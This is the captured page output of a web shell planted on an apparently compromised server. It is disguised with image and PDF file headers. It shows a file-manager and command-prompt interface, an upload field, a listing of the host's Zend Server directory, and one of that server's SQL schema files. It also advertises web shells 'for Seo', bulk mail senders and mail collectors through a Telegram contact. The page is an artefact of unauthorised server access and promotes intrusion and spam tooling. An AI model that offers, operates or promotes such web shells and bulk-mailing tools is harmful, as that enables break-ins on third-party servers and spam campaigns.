xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
CREATE TABLE IF NOT EXISTS  stats_browsers_dictionary (
		id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, 
		name varchar(64) NOT NULL,
		version varchar(64),	
		user_agent_string varchar(128)
		);
		
CREATE TABLE IF NOT EXISTS  stats_os_dictionary (
		id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, 
		name varchar(128) NOT NULL,
		version varchar(64),		
		user_agent_string varchar(128),
		mobile BIT DEFAULT 0
		);
		
CREATE TABLE IF NOT EXISTS  stats_geo_dictionary (
		id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, 
		code varchar(8) UNIQUE NOT NULL,
		name varchar(128) NOT NULL
		);
		
CREATE TABLE IF NOT EXISTS  stats_daily( 
		id INTEGER  NOT NULL PRIMARY KEY AUTOINCREMENT, 
		entry_type_id      integer,
		entry_sub_type_id  integer,
		app_id             integer, 
		node_id            integer, 
		counter_value      float, 
		from_time          integer, 
		until_time         integer, 
		user_module        varchar(128), 
		namespace          varchar(128), 
		samples            integer
		);

CREATE TABLE IF NOT EXISTS  stats_monthly( 
		id INTEGER  NOT NULL PRIMARY KEY AUTOINCREMENT, 
		entry_type_id      integer, 
		entry_sub_type_id  integer,
		app_id             integer, 
		node_id            integer, 
		counter_value      float, 
		from_time          integer, 
		until_time         integer, 
		user_module        varchar(128), 
		namespace          varchar(128), 
		samples            integer
		);
		
CREATE TABLE IF NOT EXISTS  stats_weekly( 
		id INTEGER  NOT NULL PRIMARY KEY AUTOINCREMENT, 
		entry_type_id      integer, 
		entry_sub_type_id  integer,
		app_id             integer, 
		node_id            integer, 
		counter_value      float, 
		from_time          integer, 
		until_time         integer, 
		user_module        varchar(128),
		namespace          varchar(128), 		
		samples            integer
		);
		
CREATE TABLE IF NOT EXISTS  jobqueue_executions_stats_daily ( 
		id INTEGER  NOT NULL PRIMARY KEY AUTOINCREMENT, 
		entry_type_id      integer, 
		app_id             integer, 
		queue_id           integer, 
		counter_value      float, 
		from_time          integer, 
		until_time         integer, 
		samples            integer,
		job_type           integer
		);
		
CREATE TABLE IF NOT EXISTS  jobqueue_executions_stats_weekly ( 
		id INTEGER  NOT NULL PRIMARY KEY AUTOINCREMENT, 
		entry_type_id      integer, 
		app_id             integer, 
		queue_id           integer, 
		counter_value      float, 
		from_time          integer, 
		until_time         integer, 
		samples            integer,
		job_type           integer
		);
		
CREATE TABLE IF NOT EXISTS jobqueue_executions_stats_monthly ( 
		id INTEGER  NOT NULL PRIMARY KEY AUTOINCREMENT, 
		entry_type_id      integer, 
		app_id             integer, 
		queue_id           integer, 
		counter_value      float, 
		from_time          integer, 
		until_time         integer, 
		samples            integer,
		job_type           integer
		);
		
CREATE TABLE IF NOT EXISTS jobqueue_executions_first_jobs (
    id INTEGER  NOT NULL PRIMARY KEY AUTOINCREMENT,
    first_time_updated integer NOT NULL,
    app_id             integer NOT NULL
);
CREATE UNIQUE INDEX IF NOT EXISTS  IDX_FIRST_JOBS on jobqueue_executions_first_jobs (first_time_updated, app_id);
		
CREATE TABLE IF NOT EXISTS  schema_properties (
		name varchar(128) NOT NULL PRIMARY KEY,
		value varchar(128)
		);
		
CREATE INDEX IF NOT EXISTS  IDX_DAILY_TYPE_FROM on stats_daily (entry_type_id, from_time);
CREATE INDEX IF NOT EXISTS  IDX_DAILY_FROM_NODE on stats_daily (from_time, node_id);
CREATE INDEX IF NOT EXISTS  IDX_WEEKLY_TYPE_FROM on stats_weekly (entry_type_id, from_time);
CREATE INDEX IF NOT EXISTS  IDX_WEEKLY_FROM_NODE on stats_weekly (from_time, node_id);
CREATE INDEX IF NOT EXISTS  IDX_MONTHLY_TYPE_FROM on stats_monthly (entry_type_id, from_time);
CREATE INDEX IF NOT EXISTS  IDX_MONTHLY_FROM_NODE on stats_monthly (from_time, node_id);
CREATE UNIQUE INDEX IF NOT EXISTS  IDX_BROWSERS_DICTIONARY_UNIQUE on stats_browsers_dictionary(name, version);
CREATE UNIQUE INDEX IF NOT EXISTS  IDX_OS_DICTIONARY_UNIQUE on stats_os_dictionary(name, version);

CREATE UNIQUE INDEX IF NOT EXISTS IDX_JQ_INSIGHTS_DAILY_KEY on jobqueue_executions_stats_daily(entry_type_id, from_time, app_id, queue_id, job_type);
CREATE UNIQUE INDEX IF NOT EXISTS IDX_JQ_INSIGHTS_WEEKLY_KEY on jobqueue_executions_stats_weekly(entry_type_id, from_time, app_id, queue_id, job_type);
CREATE UNIQUE INDEX IF NOT EXISTS IDX_JQ_INSIGHTS_MONTHLY_KEY on jobqueue_executions_stats_monthly(entry_type_id, from_time, app_id, queue_id, job_type);

INSERT OR IGNORE INTO schema_properties (name, value) VALUES ('version', '2019.0.0');

Filemanager

Name Type Size Permission Actions
UserServer Folder 0755
azure-plugins Folder 0755
dist Folder 0755
libraries Folder 0755
minify Folder 0755
plugins Folder 0755
scripts Folder 0755
sdk Folder 0755
selinux Folder 0755
share Folder 0755
support_tool Folder 0775
zray-cleanup-scripts Folder 0755
zs-cli-tools Folder 0755
alias-linux-apache-2.4-fpm.tpl File 385 B 0644
alias-linux-apache-2.4.tpl File 310 B 0644
alias-nginx-root.tpl File 119 B 0644
alias-nginx.tpl File 112 B 0644
alias-pase-apache-2.4.tpl File 211 B 0644
alias-windows-apache-2.4.tpl File 181 B 0644
alias.tpl File 282 B 0644
browser_mysql_create_database.sql File 2.89 KB 0644
browser_sqlite_create_database.sql File 3.17 KB 0644
create_monitor_db.sql File 5.58 KB 0644
create_monitor_rules_db.sql File 1.37 KB 0644
create_monitor_rules_fixtures.sql File 8.36 KB 0644
create_monitor_tracing_db.sql File 906 B 0644
create_pagecache_rules_db.sql File 1.15 KB 0644
deployment.xsd File 11.33 KB 0644
deployment_mysql_create_database.sql File 6.69 KB 0644
deployment_sqlite_create_database.sql File 7.35 KB 0644
devbar_fixtures.sql File 1.27 KB 0644
devbar_mysql_create_database.sql File 7.6 KB 0644
devbar_sqlite_create_database.sql File 8.59 KB 0644
gui_ibmi_update_database.sql File 268 B 0644
gui_mysql_acl_fixtures.sql File 19 KB 0644
gui_mysql_create_database.sql File 7.29 KB 0644
gui_sqlite_acl_fixtures.sql File 18.34 KB 0644
gui_sqlite_create_database.sql File 7.58 KB 0644
index.php File 18.34 KB 0644
jobqueue_mysql_create_database.sql File 4.8 KB 0644
jobqueue_sqlite_create_database.sql File 4.93 KB 0644
mysql_create_message_center_db.sql File 6.7 KB 0644
mysql_create_monitor_db.sql File 6.64 KB 0644
mysql_create_monitor_rules_db.sql File 1.42 KB 0644
mysql_create_pagecache_rules_db.sql File 1.15 KB 0644
pagecache_purge.sql File 1.51 KB 0644
sqlite_create_message_center_db.sql File 7.28 KB 0644
statistics_mysql_create_database.sql File 4.37 KB 0644
statistics_sqlite_create_database.sql File 4.68 KB 0644
stats_mysql_fixtures.sql File 35.9 KB 0644
stats_sqlite_fixtures.sql File 30.03 KB 0644
statsd_mysql_create_database.sql File 4.59 KB 0644
statsd_sqlite_create_database.sql File 2.61 KB 0644
statsd_sqlite_pagecache_create_database.sql File 2.67 KB 0644
urlinsight_mysql_create_database.sql File 2.58 KB 0644
urlinsight_sqlite_create_database.sql File 2.75 KB 0644
vhost-apache-2.4-fpm.tpl File 832 B 0644
vhost-apache-2.4.tpl File 726 B 0644
vhost-nginx-ssl.tpl File 426 B 0644
vhost-nginx.tpl File 292 B 0644
vhost-pase-apache-2.4.tpl File 480 B 0644
vhost-pase-ssl-apache-2.4.tpl File 536 B 0644
vhost-ssl-apache-2.4-fpm.tpl File 1013 B 0644
vhost-ssl-apache-2.4.tpl File 900 B 0644
vhost-ssl.tpl File 618 B 0644
vhost-windows-ssl-apache-2.4.tpl File 719 B 0644
vhost.tpl File 444 B 0644
zsd_mysql_create_schema.sql File 11.54 KB 0644
zsd_mysql_fixtures.sql File 367 B 0644
zsd_sqlite_create_schema.sql File 11.12 KB 0644
zsd_sqlite_fixtures.sql File 363 B 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1